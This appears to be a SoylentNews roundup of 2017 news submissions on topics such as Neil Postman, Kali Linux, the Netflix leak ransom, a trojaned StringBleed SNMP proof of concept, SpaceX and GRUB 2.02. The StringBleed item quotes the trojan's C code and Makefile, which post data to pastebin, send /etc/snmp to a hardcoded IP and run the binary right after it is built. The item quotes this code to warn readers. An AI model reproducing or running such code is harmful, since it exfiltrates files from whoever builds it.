Covers the period:
2017-01-01 .. 2017-04-28
(SPIDs: [586..643]) --martyb
We always have a place for talented people, visit the Get Involved section on the wiki to see how you can make SoylentNews better.
In 1985, Neil Postman observed an America imprisoned by its own need for amusement. He was, it turns out, extremely prescient.
[...] Postman today is best remembered as a critic of television: That’s the medium he directly blamed, in Amusing Ourselves to Death, for what he termed Americans’ “vast descent into triviality,” and the technology he saw as both the cause and the outcome of a culture that privileged entertainment above all else. But Postman was a critic of more than TV alone. He mistrusted entertainment, not as a situation but as a political tool; he worried that Americans’ great capacity for distraction had compromised their ability to think, and to want, for themselves. He resented the tyranny of the lol. His great observation, and his great warning, was a newly relevant kind of bummer: There are dangers that can come with having too much fun.
In 1984, Americans took a look around at the world they had created for themselves and breathed a collective sigh of relief. The year George Orwell had appointed as the locus of his dark and only lightly fictionalized predictions—war, governmental manipulation, surveillance not just of actions, but of thoughts themselves—had brought with it, in reality, only the gentlest of dystopias. Sure, there was corporatism. Sure, there was communism. And yet, for most of the Americans living through that heady decade, 1984 had not, for all practical purposes, become Nineteen Eighty-Four. They surveyed themselves, and they congratulated themselves: They had escaped.
Or perhaps they hadn’t. Postman opened Amusing Ourselves to Death with a nod to the year that had preceded it. He talked about the freedoms enjoyed by the Americans of 1984—cultural, commercial, political. And then he broke the bad news: They’d been measuring themselves according to the wrong dystopia. It wasn’t Nineteen Eighty-Four that had the most to say about the America of the 1980s, but rather Aldous Huxley’s Brave New World. “In Huxley’s vision,” Postman noted, “no Big Brother is required to deprive people of their autonomy, maturity, and history.” Instead: “People will come to love their oppression, to adore the technologies that undo their capacities to think.”
The vehicle of their oppression, in this case? Yep, the television. Which had, Postman argued, thoroughly insinuated itself on all elements of American life—and not just in the boob-tubed, couch-potatoed, the-average-American-watches-five-hours-of-television-a-day kind of way that is so familiar in anti-TV invectives, but in a way that was decidedly more intimate.
Are we having tooooo much fun ?
Think passwords, people. Think long, complex passwords. Not because a breach dump's landed, but because the security-probing-oriented Kali Linux just got better at cracking passwords.
Kali is a Debian-based Linux that packs in numerous hacking and forensics tools. It's well-regarded among white hat hackers and investigators, who appreciate its inclusion of the tools of their trades.
The developers behind the distro this week gave it a polish, adding new images optimised for GPU-using instances in Azure and Amazon Web Services. The extra grunt the GPUs afford, Kali's backers say, will enhance the distribution's password-probing powers. There's also better supoprt for GPU cracking, hence our warning at the top of this story: anyone can use Kali and there's no way to guarantee black hats won't press it into service. And they can now do so on as many GPU-boosted cloud instances as they fancy paying for.
Could some users of Kali Linux technically be called "thugs?"
"On December 26, in an encrypted chat, TheDarkOverlord (TDO) informed DataBreaches.net that they had recently come across what they described as hundreds of GBs of unreleased and non-public media from a studio located in Hollywood...TDO would not reveal the attack method nor how much the ransom demand was, but DataBreaches.net was able to obtain a copy of a contract both TDO and a representative of Larson allegedly signed. The contract, signed December 27, indicated that the studio would pay TDO 50 BTC by January 31. TDO signed the contract as "Adolf Hitler." The signature of the company representative was indecipherable, but TDO claimed that it was the CFO of the firm who signed. "
According to http://www.coindesk.com/price/ 50 BTC is US $65,984.32
This article contains more of the contract content: https://noise.getoto.net/tag/thedarkoverlord/ as well as links to the pastebin (removed) https://web.archive.org/web/20170428224235/https://pastebin.com/FKZAafQd.
And covered by TorrentFreak https://torrentfreak.com/hackers-leak-netflixs-orange-is-the-new-black-season-5-premiere-170429/
The EPA's extensive climate change website now redirects to a page that says "this page is being updated" and that "we are currently updating our website to reflect EPA's priorities under the leadership of President Trump and Administrator Pruitt." It also links to a full archive of how the page used to look on Jan. 19, before Trump's inauguration.
Recently, someone in my family was not able to get into their home PC with their password, and called for assistance. This means having to drive down to the machine to see what they are doing, and log in with the appropriate account that can reset that password. Work commitments preclude driving there right away to see what is happening, and I am trying to locate a remote access solution. If they were logged into the machine, I could use some sort of remote assistance tool, but that is not an option in this case. There is the possibility of setting up SSH or OpenVPN to access the machine via the Internet, but I am not certain leaving those tools running all the time is the smartest idea in this day and age.
What recommendations do the Soylent community have for securely managing a machine over the Internet when someone is not logged into it?
In a Security Week article by Ionut Arghir about a newly discovered SNMP vulnerability which allows authentication mechanisms to be bypassed on dozens of network device models (more detail here and here), the author included a link to a github repository (https://github.com/string-bleed/StringBleed-CVE-2017-5135 -- Don't compile and execute the code, but by all means take a look) which purports to be a proof-of-concept (POC) exploit of the vulnerability. However, it's not. It's a trojan which will exfiltrate data from your system.
From the Security Week article:
The issue, the researchers say [this is the link to the trojaned "POC"], resides in the manner in which the SNMP agent in different devices (usually cable modems) handles a human-readable string datatype value called "community string" that SNMP version 1 and 2 use.
The folks at Mitre (who manage the CVE database) caught this and make mention of the issue in their DB entry:
Certain Technicolor devices have an SNMP access-control bypass, possibly involving an ISP customization in some cases. The Technicolor (formerly Cisco) DPC3928SL with firmware D3928SL-P15-13-A386-c3420r55105-160127a could be reached by any SNMP community string from the Internet; also, you can write in the MIB because it provides write properties, aka Stringbleed. NOTE: the string-bleed/StringBleed-CVE-2017-5135 GitHub repository is not a valid reference as of 2017-04-27; it contains Trojan horse code purported to exploit this vulnerability.
The github repository contains a license, a readme, a Makefile and one source file, poc-linux.c. Looking at the C code, it's immediately clear that this is *not* an SNMP exploit (extracts from poc-linux.c):
system("curl -X POST https://pastebin.com/api/api_post.php --data 'api_option=paste&api_paste_name=dotslashhacker&api_paste_expire_date=10M&api_paste_format=c&api_paste_private=0&api_dev_key=8fc2bb602e03acd0c45830805b878497&api_paste_code=i%20randomly%20run%20PoC%20exploits%20without%20checking%20them%20first%20'");
int make_packet(char *_packet, char *_fname, int *_body_len)
char *body_line = calloc(sizeof(char), DATA_SIZE);
char *header_line = calloc(sizeof(char), DATA_SIZE);
int main(int argc, char* argv)
char *packet = calloc(sizeof(char), DATA_SIZE);
char *f_name = '/etc/snmp';
sock = socket_connect("18.104.22.168", 80);
packet_len = make_packet(packet,f_name, &body_len);
What's more, the Makefile executes the binary immediately upon compiling/linking:
gcc -Qunused-arguments -std=gnu99 poc-linux.c -o poc-linux
chmod +x poc-linux && ./poc-linux
I'm wondering why Mr. Arghir over at Security Week didn't do his due diligence (and it didn't take much, just opening the C file, or even just looking at the CVE entry at Mitre.org.
I know it goes against much of what Soylentils stand for, but TFA is a short read. Based on TFA, would any of you have simply gone to github and built this "POC" without making sure it was what it purported to be?
Also, is anyone actually still using SNMP v1/2/2c, rather than v3?
Who asked for a bunch of "Avatar" sequels for Christmas? Your wish has been granted.
Better find out what the Na'vi want for Christmas, because the blue humanoids are going to be around for a lot of them.
The official Facebook page for James Cameron's sci-fi movie franchise announced on Saturday that dates have been set for the release of the next four "Avatar" sequels, and they're all right around the big December holiday movie rush, though in different years.
"Avatar takes flight as we begin concurrent production on four sequels," the post reads. "The journey continues December 18, 2020, December 17, 2021, December 20, 2024 and December 19, 2025!"
-- submitted from IRC
Baby humpback whales seem to whisper to their mothers, according to scientists who have captured the infant whales' quiet grunts and squeaks.
The recordings, described in the journal Functional Ecology, are the first ever made with devices attached directly to the calves.
High suckling rates and acoustic crypsis of humpback whale neonates maximise potential for mother–calf energy transfer (open, DOI: 10.1111/1365-2435.12871) (DX)
SpaceX will attempt to launch a spy satellite for the first time on Sunday, breaking a 10-year United Launch Alliance monopoly on classified U.S. launches.
The two-hour launch window opens at 7:00 a.m. EDT (11:00 UTC), with a backup launch window the next day at the same time. SpaceX will attempt to recover the first stage rocket.
[UPDATE 1: The launch is being live-streamed on YouTube. --martyb]
[UPDATE 2: Launch was scrubbed at T minus 1 minute due to "a sensor issue on the first stage" — launch now scheduled for same time tomorrow: Monday, May 1, 2017 at 0700 EDT / 1100 UTC. --martyb]
Submitted via IRC for TheMightyBuzzard
With slick marketing, catchy taglines and some pretty bold claims about their security, nomx claim to have cracked email security.
This thorough article tells all about the device, and it doesn't measure up at all to its marketing.
It would be very easy to conclude that this is a scam. The device is running standard mail server software running on a Raspberry Pi, most of which is outdated. They have presented at countless tech shows and can be constantly found making bold statements of 'absolute security' yet didn't pick up a CSRF vulnerability in their web interface.
Nomx has issued a reply on their main page in a post titled 'nomx Passes Security Tests After Blogger Claims to Have Penetrated nomx'. In that reply nomx states the following results:
No nomx user was affected by this threat. No nomx user could be affected by this threat in the future. No nomx data was compromised, and the blogger has (finally) reluctantly verified this. He still has not publicly shared these statements, except via an email response to the BBC when directly asked on April 25 the response was:
From the BBC to nomx: "I understand from your replies that you state categorically that no nomx accounts have been affected by this hack. I have put your questions to [blogger] who has confirmed to me that he cannot say that any have."
While nomx is no longer based on Raspberry devices, we still maintain that the users' data is secured as we've demonstrated to the blogger, the media and our customers.
Also at Ars Technica
It's reported that, as of 11 April, patches are available for a security bug in Microsoft Office and in Wordpad which was disclosed to the company in October. The flaw was widely exploited after McAfee blogged about it. It affects Microsoft Office 2007 SP3 and Windows Vista SP2; the latter was released in May 2009 and the former in October 2011.
[...] CVE-2017-0210 in Internet Explorer, and CVE-2017-2605 in Office – are being actively attacked in the wild by miscreants and the Dridex malware. That latter bug has no patch, by the way: Microsoft just switched off an exploited PostScript filter by default.
further information: CVE-2017-0199
An extremely cold and relatively small exoplanet has been discovered using gravitational microlensing. The planet orbits an ultracool red or brown dwarf at a distance of around 1.16 AU:
Scientists have discovered a new planet with the mass of Earth, orbiting its star at the same distance that we orbit our sun. The planet is likely far too cold to be habitable for life as we know it, however, because its star is so faint. But the discovery adds to scientists' understanding of the types of planetary systems that exist beyond our own.
[...] The newly discovered planet, called OGLE-2016-BLG-1195Lb, aids scientists in their quest to figure out the distribution of planets in our galaxy. An open question is whether there is a difference in the frequency of planets in the Milky Way's central bulge compared to its disk, the pancake-like region surrounding the bulge. OGLE-2016-BLG-1195Lb is located in the disk, as are two planets previously detected through microlensing by NASA's Spitzer Space Telescope.
Popsci press couldn't resist calling it "Hoth", although it would be even less hospitable.
An Earth-mass Planet in a 1 au Orbit around an Ultracool Dwarf (open, DOI: 10.3847/2041-8213/aa6d09) (DX)
Kotaku reports that:
[...] Nintendo announced the New 2DS XL, a sleek $150 piece of hardware that is essentially a New 3DS XL without 3D. This is an iteration on 2013's 2DS, a cheaper model that also ditched the 3D but felt uncomfortable and lacked the convenient clamshell design of other models.
The new model is planned to be available in July in the United States, at around $150.
takyon: Is glasses-free 3D dead?
Nintendo 3DS was released in Japan on February 26, 2011 and worldwide the following month. The price was cut by $80 on July 28, 2011.
Softpedia News reports that version 2.02 of the GRUB boot loader has been released. Among the many new features are support for LZ4 compression on ZFS, 64-bit ext2, XFS v5, Morse code output and a modem-like output through the PC speaker, Xen paravirtualisation, TrueCrypt ISOs, Apple fat binaries on non-Apple hardware, and 16-bit mode on non-x86 hardware.
A research misconduct investigation of a prominent stem cell lab by the Harvard University–affiliated Brigham and Women's Hospital (BWH) in Boston has led to a massive settlement with the U.S. government over allegations of fraudulently obtained federal grants. As Retraction Watch reports, BWH and its parent health care system have agreed to pay $10 million to resolve allegations that former BWH cardiac stem cell scientist Piero Anversa and former lab members Annarosa Leri and Jan Kajstura relied on manipulated and fabricated data in grant applications submitted to the U.S. National Institutes of Health (NIH).
A statement from the U.S. Attorney's Office for the District of Massachusetts released today notes that it was BWH itself that shared the allegations against Anversa's lab with the government. The hospital had been conducting its own probe into the Anversa lab since at least 2014, when a retraction published in the journal Circulation revealed the ongoing investigation. The hospital has not yet released any findings.